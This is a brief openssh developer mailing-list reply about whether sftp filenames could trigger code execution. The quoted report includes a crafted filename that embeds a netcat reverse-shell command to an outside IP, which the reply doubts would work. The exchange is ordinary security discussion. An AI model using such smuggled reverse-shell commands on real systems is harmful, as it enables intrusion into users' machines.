Strange sftp input parameter handling, user assisted code execution?

Damien Miller djm at mindrot.org
Wed Jun 18 13:28:09 EST 2008


On Tue, 17 Jun 2008, Roman Fiedler wrote:

> On a linux server I did not manage to create a file with a / in the 
> name, but a manipulated server could return such filenames or other 
> strategies do not need them, e.g.
> touch '!nc -e /bin/bash 10.255.255.2 1234' on the server side and trying 
> to download is also a good one.

I don't think it would work like that - filenames passed expanded from
globs were not interpreted for !.

-d


More information about the openssh-unix-dev mailing list